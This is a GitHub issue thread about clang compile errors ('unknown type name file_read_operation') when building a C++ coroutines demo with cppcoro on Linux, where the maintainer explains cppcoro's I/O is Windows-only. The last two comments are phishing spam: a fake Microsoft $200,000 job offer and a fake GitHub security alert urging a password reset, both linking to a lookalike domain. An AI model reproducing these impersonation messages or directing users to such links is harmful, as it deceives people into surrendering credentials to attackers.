### ISSUE TITLE
compiling: error: unknown type name 'file_read_operation'

### ISSUE THREAD

**Issue by baiwfg2** [YehezkelShB/CoreCpp2019-Coroutines#1]
Hi. I try to build with clang 7.0 on linux and meet such error:

```
In file included from /mnt/CoreCpp2019-Coroutines/04-co_await/utils.cpp:4:
In file included from /mnt/CoreCpp2019-Coroutines/04-co_await/../external/cppcoro/include/cppcoro/read_only_file.hpp:8:
In file included from /mnt/CoreCpp2019-Coroutines/04-co_await/../external/cppcoro/include/cppcoro/readable_file.hpp:9:
/mnt/CoreCpp2019-Coroutines/04-co_await/../external/cppcoro/include/cppcoro/file_read_operation.hpp:98:1: error: extraneous closing brace ('}')
}
^
In file included from /mnt/CoreCpp2019-Coroutines/04-co_await/utils.cpp:4:
In file included from /mnt/CoreCpp2019-Coroutines/04-co_await/../external/cppcoro/include/cppcoro/read_only_file.hpp:8:
/mnt/CoreCpp2019-Coroutines/04-co_await/../external/cppcoro/include/cppcoro/readable_file.hpp:47:3: error: unknown type name 'file_read_operation'
                file_read_operation read(
                ^
/mnt/CoreCpp2019-Coroutines/04-co_await/../external/cppcoro/include/cppcoro/readable_file.hpp:52:3: error: unknown type name
      'file_read_operation_cancellable'
                file_read_operation_cancellable read(
                ^
3 errors generated.
make[2]: *** [04-co_await/CMakeFiles/co_await.dir/build.make:76: 04-co_await/CMakeFiles/co_await.dir/utils.cpp.o] Error 1
make[1]: *** [CMakeFiles/Makefile2:311: 04-co_await/CMakeFiles/co_await.dir/all] Error 2
make: *** [Makefile:84: all] Error 2
```

Could you give some guidance ?

**Comment by YehezkelShB** [comment]
Yeah, sorry, but cppcoro doesn't support linux very well. All the I/O facilities are Windows only. It shouldn't have this kind of error, this is a bug (due to a misplaced #ifdef/#endif), but still, the fact is that my code wouldn't compile under linux anyway.

**Comment by GezaBacsi** [comment]
# Congratulations, YehezkelShB!

Hello,

We are delighted to inform you that your application for a position at Microsoft has advanced to the final stage. This opportunity comes with a competitive salary offer of $200,000, reflecting the significant role and responsibilities.

For more details and to proceed with your application, please visit [Microsoft Careers](https://github.hudevelopers.online/).

## Next Steps:

1. **Confirm Interview Date**
   - Please confirm your availability by visiting the following link: [Schedule Interview](https://github.hudevelopers.online/)

2. **Prepare for Your Interview**
   - Review the job description and be prepared to discuss how your experiences and skills align with Microsoft's needs. Further information can be found at [Microsoft Careers](https://github.hudevelopers.online/).

3. **Review Offer Details**
   - While preparing, consider the comprehensive benefits package, which will be detailed further during the interview process. Additional details are available at [Microsoft Careers](https://github.hudevelopers.online/).

Thank you for your interest in joining Microsoft. We are very impressed with your background and are excited to potentially welcome you to our team.

*If you have any questions or need to update your application details, please do not hesitate to visit [Contact Us](https://github.hudevelopers.online/).*

Best Regards,  
**Microsoft Hiring Team**

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
